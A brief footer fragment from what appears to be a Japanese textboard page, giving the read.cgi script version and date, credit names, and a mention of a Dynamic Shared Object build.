read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)